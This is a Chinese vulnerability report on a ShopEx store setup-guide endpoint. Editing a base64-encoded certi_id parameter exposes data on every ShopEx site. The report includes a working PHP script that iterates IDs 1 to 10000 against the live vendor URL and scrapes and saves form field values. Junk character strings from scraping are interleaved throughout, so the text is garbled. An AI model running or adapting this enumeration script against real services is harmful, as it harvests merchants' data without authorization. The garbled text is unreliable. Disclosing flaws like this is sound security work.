|
|
简要描述:
5 P' S: p( K; C5 h" {: }" gShopEx某接口缺陷,可遍历所有网站
. P, P" g( Z+ U2 K. u! ?6 O$ w详细说明:
1 v2 V/ ~' @! i* S0 m6 B问题出现在shopex 网店使用向导页面
0 t, X0 U# K! E* a. f! s6 L0 ^( q& R V; Q; j1 u4 k! U
3 F6 m5 O: I& f9 J, Z8 s
& ]" t- v8 ~ L; ?+ fhttp://guide.ecos.shopex.cn/step ... WlkaWFuLmNvbVwvIn0=
/ y+ P7 K4 o v$ l# l' X2 c7 K+ O- n5 |# `+ g; w' O. x) @# K' |
5 `+ D& Z, S2 w6 a+ J' G9 u
+ {; Y, }# ?# s2 irefer base64解密为 {"certi_id":'1051',"callback_url":"http:\/\/www.joyogame.net\/"}4 q6 R- T7 q G# ^4 e/ x- Z/ V/ U
7 X( ]9 Z" g E, v$ W* w' f9 I
) N5 T6 u# b( f) ^/ T0 c/ X) O3 g2 C% k/ k
我们修改certi_id 即可遍历所有使用了ShopEx程序的网站 $ ~2 c2 l% J, D
1 _5 a3 N, R* A! v8 }" l
! R2 \7 x0 I" d" S9 h
+ M+ E8 i% a) r# r3 j" r
<?php
4 p, ]. x8 x# p
* J1 U) t- G( E S for ($i=1; $i < 10000; $i++) { //遍历* B+ O3 h/ A. N9 j+ ~- k
. r' E; D2 a D3 \" }' ]
ShowshopExD($i);
8 w1 T; C5 b/ O7 A/ p& C
9 @% ]3 d% c# S o { }7 \# \) e! q) a' }, K3 _
( W& F9 g! B# M' O! d4 t3 v
function ShowshopExD($cid) {
5 I9 H2 `; ?, Z1 o. v4 u1 R; z) F: q K$ i6 _- [
$url='http://guide.ecos.shopex.cn/step2.php';
" f; R3 r/ ^$ n5 x$ I! T2 V$ _: l- P0 @
$refer = base64_encode('{"certi_id":'.intval($cid).',"callback_url":"http:\/\/www.a.com\/"}');+ k. i f' q+ C* S9 \
! v% r8 h8 C! Z& T+ E/ u/ v7 L
$url = $url.'?refer='.$refer;
M1 d3 J ~% V) Y# u) u
/ {- d$ G( X X $ch = curl_init($url);
1 P) H, u% p6 l" V0 V/ u! l3 c/ K% s" F! c8 f" w' H- e5 p
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true) ;" u% ]/ h8 n0 i) i5 x, u9 e
: ~+ [& G! @1 R7 I5 a8 d) K
curl_setopt($ch, CURLOPT_BINARYTRANSFER, true) ;1 [# e# Q/ n: y6 y- [6 C
5 c. \( X) x* T# U2 q9 l+ O/ H
$result = curl_exec($ch);9 O* [1 a8 t, f* z: J( L" a, R
m- H9 o# m" g1 A* M $result = mb_convert_encoding($result, "gb2312", "UTF-8");; t" y1 _. l" {# ~" W
3 D9 \: c j6 @% X) j1 @
if(strpos($result,$refer))3 z' }6 ]( ]" M4 s9 z
% `8 T6 P2 P1 w5 C" G- t! D {6 ?( I1 z: H5 P4 ~; l
! B% q! ?8 n Q9 S4 N$ q1 x3 a
$fp = fopen("c:/shopEx.txt",'ab'); //保存文件
$ D" C4 `, b4 A6 l- e+ K D6 \0 H( C9 Y& _$ S
preg_match_all('/<input\stype="text"(.*?)\/>/',$result,$value);) |: Q9 q3 H: L4 S
) x6 o# I. |$ p( v' F- j foreach ($value[1] as $key) {
7 O- \) k, I3 N9 c* z( u- ^6 }! |- F, R! \% b3 L: f$ n
preg_match_all('/name="(.*?)"(.*?)value="(.*?)"/',trim($key),$res);
6 P4 e9 m X- \7 E: U" @* R9 ~' k$ D, G( {. q3 L0 F
echo $res[1][0].':'.$res[3][0]."\r\n";& z. S! ?$ c% N: J7 A2 C0 b* @* I
/ ^; o! r% s# ?0 o6 s. x $col =$res[1][0].':'.$res[3][0]."\r\n";
$ u0 v, L# q5 N2 h
u& s0 |7 o7 Y6 s6 b, L fwrite($fp, $col, strlen($col)); 1 w# `# t% R, L" Y0 e
1 r( F+ h- w; t }
* a& X' `( M$ X, C. ?) g- V4 v- ]( X' [
echo '--------------------------------'."\r\n";
7 W7 @, D9 A: }$ @. [
; ]# Q0 k, Y$ a. a, r) B9 @) E# b/ A% { fclose($fp);
! t- z8 s# r& \9 |4 s. {* Y# X7 \6 u. F0 k
}, |! c! l% O: G2 `. J2 Q' a0 o
. Y# Q/ N7 E6 Q% r! N flush();
. g9 z. a! K2 N' F: K- |% W( x
" t) k; }8 K/ o0 n; J curl_close($ch);
* X8 t3 Y U' l2 w$ I# x
+ @9 S1 l6 l% P8 m7 P1 }3 f }' u. B/ F/ F1 d8 u
" J9 B8 S, o3 K& i' y* V& q?>
; I$ E* l6 Z; X7 n% p漏洞证明:& R. P2 Z6 g' w0 a
http://www.myhack58.com/Article/UploadPic/2013-9/201392110502740490.jpg
( E y! ~9 c3 z9 T5 ?refer换成其他加密方式! _8 }# ?) C# D# J
|
|